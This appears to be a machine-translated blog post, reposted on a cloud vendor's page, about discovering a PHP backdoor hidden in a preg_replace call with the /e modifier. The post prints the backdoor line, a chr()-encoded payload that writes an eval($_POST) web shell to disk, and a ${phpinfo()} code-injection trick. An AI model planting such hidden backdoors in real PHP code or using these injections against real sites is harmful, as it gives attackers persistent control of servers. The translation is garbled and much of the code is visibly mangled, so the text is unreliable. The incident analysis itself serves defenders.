Recording one discovery using preg_replace to hide backdoors and subsequent Exploration

Source: Internet
Author: User

There are a lot of php backdoors, and there are too many steamed buns and games. But when I helped my friends Check the server, I found such malicious code. This is the case. None of the tools used by a friend's website to search for backdoors found a php Trojan. I can't find it all the time. The tricks of Xiao Hei are very advanced. I always delete the backdoors after each use, but I can continue to come in every time, and I can't find where I come in. This is really a pain point. Later, I found a trace of clues in the log. Through my analysis, I found that an IP address is always very strange to POST data to a file. After a while, the IP address will access an inexplicable file. The name is obviously not a normal system file, but a PHP backdoor. However, the backdoor will be deleted soon. Haha, I am very careful when I encounter a problem. Then, through analysis, we found that the code of the file accessed by Xiao Hei was: @ preg_replace ("// e", $ _ POST ['in _ COMSENZ '], "Access Denied "); if you see this code, there is no problem, but it is the malicious code and backdoor hidden by Xiao Hei. Concealed. Basically, no scanning or removal software can be found. Preg_replace function prototype: mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit]) Note:/e modifier enables preg_replace () use the replacement parameter as PHP code (after appropriate reverse references are replaced ). Tip: Make sure that the replacement constitutes a valid PHP code string. Otherwise, PHP will report a syntax parsing error in the row containing preg_replace. The above code is POST to accept data to test, it is more troublesome, If you replace it with GET to obtain data... Example: www.2cto.com echo preg_replace ("/test/e", $ _ GET ["h"], "jutst test"); if we submit? H = phpinfo (), phpinfo () will be executed (using the/e modifier, preg_replace will execute the replacement parameter as PHP code ). If we want to POST, what will happen if we test and submit the following code? H = eval (chr (1, 102 ). chr (1, 112 ). chr (1, 117 ). chr (1, 116 ). chr (1, 115 ). chr (40 ). chr (1, 102 ). chr (1, 111 ). chr (1, 112 ). chr (1, 101 ). chr (1, 110 ). chr (40 ). chr (39 ). chr (1, 100 ). chr (97 ). chr (1, 116 ). chr (97 ). chr (47 ). chr (97 ). chr (46 ). chr (1, 112 ). chr (1, 104 ). chr (1, 112 ). chr (39 ). chr (44 ). chr (39 ). chr (1, 119 ). chr (39 ). chr (41 ). chr (44 ). chr (39 ). chr (60 ). chr (63 ). chr (1, 112 ). chr (1, 104 ). chr (1, 112 ). chr (32 ). chr (1, 101 ). chr (1, 118 ). chr (97 ). chr (1, 108 ). chr (40 ). chr (36 ). chr (95 ). chr (80 ). chr (79 ). chr (83 ). chr (84 ). chr (91 ). chr (99 ). chr (1, 109 ). chr (1, 100 ). chr (93 ). chr (41 ). chr (63 ). chr (62 ). chr (39 ). chr (41 ). the plaintext corresponding to the chr (59) ciphertext is: fputs (fopen (data/. php, w),); the execution result is to generate a trojan file in the/data/directory.. php. This is horrible .... Another difficult example: <? 2 function test ($ str) 3 {4} 5 echo preg_replace ("/s * [php] (. + ?) [/Php] s */ies ", 'test (" \ 1 ") ', $ _ GET [" h "]); 6?> Submit? H = [php] phpinfo () [/php]. Will phpinfo () be executed? Certainly not. After regular expression matching, the replacement parameter is changed to 'test ("phpinfo") '. In this case, phpinfo is only treated as a string parameter. Is there a way to execute it? Of course. In this case, if we submit? H = [php] {$ {phpinfo ()} [/php], phpinfo () will be executed. Why? In php, if a double quotation mark contains a variable, the php interpreter replaces it with the result after the variable is interpreted. Variables in single quotation marks are not processed. Note: Functions in double quotation marks are not executed and replaced. Here we need to construct a special variable through {$ {}, 'test ("{$ {phpinfo ()}}")', to make the function run ($ {phpinfo ()} will be interpreted and executed ). You can perform the following test first: echo "{$ {phpinfo ()}"; phpinfo will be successfully executed. Therefore, when searching for backdoors, you must find them. OK, I have learned so much about it. The above code is: @ preg_replace ("// e", $ _ POST ['in _ COMSENZ '], "Access Denied"); the seemingly normal code is actually an extremely dangerous code, which is quite hidden. Haha. Hope to help you

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.